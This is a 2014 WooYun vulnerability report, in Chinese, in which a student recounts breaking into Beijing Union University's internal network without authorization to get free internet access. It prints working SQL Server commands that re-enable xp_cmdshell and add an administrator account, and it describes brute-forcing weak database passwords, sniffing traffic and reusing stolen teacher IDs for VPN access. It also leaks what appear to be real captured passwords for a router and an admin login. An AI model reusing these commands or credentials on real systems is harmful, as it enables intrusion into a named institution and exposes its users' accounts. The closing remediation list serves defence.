当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077615

漏洞标题:北京联合大学内网渗透小记

相关厂商:北京联合大学

漏洞作者: CkDebug

提交时间:2014-09-28 12:38

修复时间:2014-11-12 12:42

公开时间:2014-11-12 12:42

漏洞类型:服务弱口令

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-28: 细节已通知厂商并且等待厂商处理中
2014-09-29: 厂商已经确认,细节仅向厂商公开
2014-10-09: 细节向核心白帽子及相关领域专家公开
2014-10-19: 细节向普通白帽子公开
2014-10-29: 细节向实习白帽子公开
2014-11-12: 细节向公众公开

简要描述:

故事前景:
目前来到北京联合大学学习逆向工程,教室的局域网实在太卡,所以打起了校园无线网BUU的主意.但没有学号登录,只能另避蹊径想办法绕过验证.下面开始展开小逸的内网渗透之旅,没啥技术含量,大牛请飘过...

详细说明:

故事前景:
目前来到北京联合大学学习逆向工程,教室的局域网实在太卡,所以打起了校园无线网BUU的主意.但没有学号登录,只能另避蹊径想办法绕过验证.下面开始展开小逸的内网渗透之旅,没啥技术含量,大牛请飘过...

image001.png


image003.png


校园内网渗透有几个思路,WEB渗透,MSQSQL弱口令提权,MYSQL弱口令提权,3389爆破...等.小逸就先从数据库弱口令开始吧.请出短小精悍的S扫描器,扫局域网网段内的1433端口,

image008.jpg


扫出IP后整理成文本用scan(图片中我重命名了scan)挂字典批量扫MSSQL弱口令.

image007.png


开始穷举字典中的密码,匹配的保存为M.txt文本

image009.png


弱口令出来了,用SQL查询分析器(修正版)连接数据库,利用常用存储扩展提权,提权的代码度娘上泛滥.我会上传在附件中.
先查看是否开启终端(不开启用命令开启),终端端口为多少
查看3389端口
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'

image011.png


恢复时一些常用的SQL语句:
利用sp_addextendedproc恢复大部分常用存储扩展(得先利用最顶上的语句恢复自己):
use master
exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
exec sp_addextendedproc xp_dirtree,'xpstar.dll'
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'

image014.jpg


xp_cmdshell添加用户:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
exec master.dbo.xp_cmdshell 'net user CkDebug 123456 /add'
exec master.dbo.xp_cmdshell 'net localgroup administrators CkDebug /add'

image015.png


成功建立帐号 CkDebug \123456

image017.png


表中不少敏感信息,怕被查水表我就不贴全图了.(仅供测试,过后我会把帐号删除)

image019.png


价值不大,不过目的已经达到,最终小逸建立了VPN达到了绕过验证上网的目的.
基本上扫出的弱口令都能提权,下面贴下几个图

image021.png


(16核心8G服务器)

image023.png


(计费管理系统)
思路和手法都一样,我就不重复了.目的也已经达到,架设了VPN免费上网..但美中不足的是被限速了,服务器里下载速度可以达到100M独享,本地链接服务器VPN只是100KB左右(听说上一期师兄也用服务器代理,下载速度也是60M每秒.前段时间被管理员发现了所以限速了)我猜想是连接到BUU无线这被限制了速度,接入内网的时候限速了.想到两个解决思路.第一接WAN(教室内有网线,教室附近有机箱.弄个迷你路由接有限然后ap热点.).第二继续渗透路由,修改限速.(毕竟第一个比较危险,被发现的时候一抓一个准).
在服务器中嗅探抓包.

image025.png

image027.png


card.buu.edu.cn/homeLogin.action是校园卡查询系统,嗅探到帐号(学号和密码),最后经过测试,校园卡一卡通的帐号能查询饭卡,登录BUU验证等,作用很大....(工号位数比较短的是教师的工号,最后发现,这工号作用很大)

image030.jpg


嗅探出
http://192.168.192.14/web 路由
root bshdl-97h

image031.png


image033.png


嗅探出http://1.202.89.6/muc/login.action
admin MUNCAdministrator

image036.jpg


嗅探出的敏感密码太多 我就不一一列举了,下面小逸就讲讲利用嗅探到的密码继续渗透

image038.jpg


利用得到的工号和密码登录上了BUU.又一个办法免费上网了....

image040.jpg


在外网可以利用教师的工号登录SSL VPN

image042.jpg


image043.png


image045.png


image047.png


image049.png


image051.png


image053.png


image055.png

漏洞证明:

MYSQL弱口令也测试过,利用查询命令也可以root.
还有不少敏感的网址和密码我就不一一截图了,既然目的已经达到了,就风扯吧,此次渗透只是测试,已经把日志和所建的帐号删除,请大大勿跨省.

修复方案:

第一 修改MSSQL或者MYSQL默认端口,修改密码复杂
第二 服务器绑定网关,或者装arp防火墙禁止嗅探
第三 教师密码初始化后第一次登录要求改密码
第四 敏感地址如路由等绑定mac访问
第五 不用请我吃饭了,也别来找我麻烦吧.我是一个学生,也是一个雷锋

版权声明:转载请注明来源 CkDebug@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-09-29 16:03

厂商回复:

最新状态:

暂无